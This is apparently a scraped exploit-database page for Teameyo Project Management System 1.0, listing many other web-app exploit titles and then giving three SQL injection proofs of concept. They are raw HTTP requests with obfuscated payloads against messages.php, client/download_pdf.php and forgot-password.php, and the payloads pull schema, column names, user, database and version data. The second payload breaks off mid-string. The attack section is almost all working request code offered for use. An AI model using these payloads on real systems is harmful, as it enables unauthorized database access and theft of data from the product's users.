Menu

Improved exploit search engine. Try python and hit enter

"Teameyo Project Management System 1.0 - SQL Injection"

Author

"Ihsan Sencan"

Platform

php

Release date

2019-01-28

Release Date Title Type Platform Author
2019-03-22 "Inout Article Base CMS - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-22 "Meeplace Business Review Script - 'id' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-22 "Matri4Web Matrimony Website Script - Multiple SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-21 "Bootstrapy CMS - Multiple SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-21 "Placeto CMS Alpha v4 - 'page' SQL Injection" webapps php "Abdullah Çelebi"
2019-03-21 "uHotelBooking System - 'system_page' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-21 "The Company Business Website CMS - Multiple Vulnerabilities" webapps php "Ahmet Ümit BAYRAM"
2019-03-21 "Netartmedia Vlog System - 'email' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia Deals Portal - 'Email' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "202CMS v10beta - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-20 "Netartmedia PHP Business Directory 4.2 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia PHP Dating Site - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia Jobs Portal 6.1 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia PHP Real Estate Agency 4.0 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-20 "Netartmedia PHP Car Dealer - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-19 "Netartmedia Real Estate Portal 5.0 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-19 "Netartmedia PHP Mall 4.1 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-19 "Netartmedia Event Portal 2.0 - 'Email' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-19 "eNdonesia Portal 8.7 - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-19 "MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting" webapps php 0xB9
2019-03-19 "Gila CMS 1.9.1 - Cross-Site Scripting" webapps php "Ahmet Ümit BAYRAM"
2019-03-18 "TheCarProject v2 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-15 "Moodle 3.4.1 - Remote Code Execution" webapps php "Darryn Ten"
2019-03-15 "Laundry CMS - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities" webapps php "Gionathan Reale"
2019-03-15 "ICE HRM 23.0 - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload" webapps php "Daniele Scanu"
2019-03-14 "Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution" webapps php R3zk0n
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-03-13 "pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Gionathan Reale"
Release Date Title Type Platform Author
2019-01-28 "Mess Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-28 "Teameyo Project Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-25 "GreenCMS 2.x - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-25 "GreenCMS 2.x - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "SimplePress CMS 1.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "Joomla! Component JHotelReservation 6.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "Joomla! Component J-CruisePortal 6.0.4 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component VMap 1.9.6 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vRestaurant 1.9.4 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vReview 1.9.11 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vWishlist 1.0.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vBizz 1.0.7 - Remote Code Execution" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vBizz 1.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-22 "Joomla! Component Easy Shop 1.2.3 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-21 "PHP Uber-style GeoTracking 1.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "PHP Dashboards NEW 5.8 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-21 "PHP Dashboards NEW 5.8 - 'dashID' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "MoneyFlux 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "Reservic 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "Coman 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "Kepler Wallpaper Script 1.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-18 "phpTransformer 2016.9 - Directory Traversal" webapps php "Ihsan Sencan"
2019-01-18 "phpTransformer 2016.9 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-18 "SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-16 "doorGets CMS 7.0 - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-16 "Roxy Fileman 1.4.5 - Arbitrary File Download" webapps php "Ihsan Sencan"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46270/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
# Exploit Title: Teameyo - Project Management System 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-28
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.teameyo.com/
# Software Link: https://codecanyon.net/item/teameyo-project-management-system/23142804
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/messages.php?project_id=[SQL]
# 

GET /[PATH]/messages.php?project_id=-48%27%20union%20select%20(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=1ug6oq40f09kft3jqncc4pco71
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Jan 2019 17:29:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Powered-By: PHP/7.2.14, PleskLin

# POC: 
# 2)
# http://localhost/[PATH]/client/download_pdf.php
# 

POST /[PATH]/client/download_pdf.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 340
Cookie: PHPSESSID=1ug6oq40f09kft3jqncc4pco71
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
milestone_id=%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c(SELECT(@x)FROM(SELECT(@x: =0x00),(@NR
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Jan 2019 17:37:03 GMT
Content-Type: application/pdf
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: private, must-revalidate, post-check=0, pre-check=0, max-age=1
Pragma: public
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Jan 2019 17:37:03 GMT
Content-Disposition: inline; filename="invoice.pdf"
X-Powered-By: PHP/7.2.14, PleskLin

# POC: 
# 3)
# http://localhost/[PATH]/forgot-password.php 
# 

POST /[PATH]/forgot-password.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 298
Cookie: PHPSESSID=1ug6oq40f09kft3jqncc4pco71
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
email=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&forgot-password=FORGET%2BPASSWORD: undefined
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Jan 2019 17:44:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Powered-By: PHP/7.2.14, PleskLin